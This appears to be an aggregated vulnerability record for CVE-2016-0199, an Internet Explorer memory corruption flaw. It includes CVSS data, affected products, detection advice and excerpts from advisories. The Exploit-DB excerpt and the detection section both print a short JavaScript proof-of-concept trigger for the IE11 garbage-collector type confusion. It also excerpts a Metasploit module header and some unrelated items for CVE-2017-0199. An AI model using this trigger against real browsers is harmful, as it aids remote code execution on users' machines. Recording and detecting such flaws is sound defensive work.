CVE-2016-0199
published 2016-06-16CVE-2016-0199: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web…
PriorityP267high8.8CVSS 3.0
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
51.00%
98.8th percentile
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0200 and CVE-2016-3211.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| msrc | internet_explorer_10_on_windows_server_2012 | — | — |
| msrc | internet_explorer_11_on_windows_10_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_rt_8.1 | — | — |
| msrc | internet_explorer_11_on_windows_server_2012_r2 | — | — |
| msrc | internet_explorer_9_on_windows_server_2008_for_32-bit_systems_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_server_2008_for_x64-based_systems_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_vista_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_vista_x64_edition_service_pack_2 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandoElement = document.createElement("IMG"); var oAttr = document.createAttribute("loop"); oAttr.nodeValue = oElement; oElement.loop = 0x41424344; oElement.setAttributeNode(oAttr); oElement.removeAttributeNode(oAttr); CollectGarbage();↗
- →Look for JavaScript patterns invoking CollectGarbage() following setAttribute/removeAttributeNode manipulation on IMG elements — hallmark of the IE11 garbage collector attribute type confusion exploit (MS16-063). ↗
- →The exploit targets Internet Explorer 11 specifically; monitor for IE11 process anomalies (e.g., iexplore.exe spawning child processes) following visits to untrusted or user-content-hosting websites. ↗
- →Exploitation likelihood is rated 'More Likely' for both latest and older software releases; prioritize detection on unpatched IE instances (KB3160005, KB3163017, KB3163018 absent). ↗
- ·Internet Explorer on Windows Server 2008/2008 R2/2012/2012 R2 runs in Enhanced Security Configuration (restricted mode) by default, which reduces but does not eliminate exploitation risk. ↗
- ·EMET can be configured to work with Internet Explorer to help mitigate exploitation of this memory corruption vulnerability. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_msrc8.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v2q7-558q-p2qh: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 8.8
CVE-2016-0199 [HIGH] CWE-119 GHSA-v2q7-558q-p2qh: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0200 and CVE-2016-3211.
GHSA
GHSA-m4vr-qxj3-p6xm: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 8.8
CVE-2016-3211 [HIGH] CWE-119 GHSA-m4vr-qxj3-p6xm: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0199 and CVE-2016-0200.
GHSA
GHSA-w823-xr62-8g3q: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
ghsa_unreviewed·2022-05-14·CVSS 8.8
CVE-2016-0200 [HIGH] CWE-119 GHSA-w823-xr62-8g3q: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a craf
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0199 and CVE-2016-3211.
Microsoft
Internet Explorer Memory Corruption Vulnerability
vendor_msrc·2016-06-14·CVSS 8.8
CVE-2016-0199 [HIGH] Internet Explorer Memory Corruption Vulnerability
Internet Explorer Memory Corruption Vulnerability
Description: A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
An attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to vie
No detection rules found.
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it´s possible to exploit it through Excel too, however the target would ne
Exploit-DB
Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)
exploitdb·2017-04-25
CVE-2017-0199 Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)
Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec
Exploit-DB
Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)
exploitdb·2016-06-21·CVSS 8.8
CVE-2016-0199 [HIGH] Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)
Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)
---
oElement = document.createElement("IMG");
var oAttr = document.createAttribute("loop");
oAttr.nodeValue = oElement;
oElement.loop = 0x41424344; // Set original value data to 44 43 42 41
oElement.setAttributeNode(oAttr); // Replace oElement with original value data
oElement.removeAttributeNode(oAttr);
CollectGarbage(); // Use original value data as address 0x41424344 of a vftable
Trendmicro
FormBook Adds Latest Office 365 0-Day Vulnerability CVE-2021-40444 to Its Arsenal
blogs_trendmicro·2021-09-29·CVSS 8.8
CVE-2021-40444 [HIGH] FormBook Adds Latest Office 365 0-Day Vulnerability CVE-2021-40444 to Its Arsenal
Exploits & Vulnerabilities
# FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal
Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.
By: Trend Micro
2021/09/29
Read time: ( words)
Save to Folio
Trend Micro detected a new campaign using a recent version of the known FormBook malware, an infostealer that has been around since 2016. Several analyses have been written about FormBook in the last few years, including the expanded support for macOS. FormBook is famous for highly obfuscated payloads and the use of document CVE exploitation. Until recently, FormBook mostly exploited CVE- 2017-0199, but newer FormBook variants used
Zscaler
Zscaler found Multiple Security Vulnerabilities | 06-14-2016
blogs_zscaler
Zscaler found Multiple Security Vulnerabilities | 06-14-2016
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
http://packetstormsecurity.com/files/137533/Microsoft-Internet-Explorer-11-Garbage-Collector-Attribute-Type-Confusion.htmlhttp://seclists.org/fulldisclosure/2016/Jun/44http://www.securityfocus.com/archive/1/538706/100/0/threadedhttp://www.securitytracker.com/id/1036096https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-063https://www.exploit-db.com/exploits/39994/https://www.verisign.com/en_US/security-services/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1226http://packetstormsecurity.com/files/137533/Microsoft-Internet-Explorer-11-Garbage-Collector-Attribute-Type-Confusion.htmlhttp://seclists.org/fulldisclosure/2016/Jun/44http://www.securityfocus.com/archive/1/538706/100/0/threadedhttp://www.securitytracker.com/id/1036096https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-063https://www.exploit-db.com/exploits/39994/https://www.verisign.com/en_US/security-services/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1226
2016-06-16
Published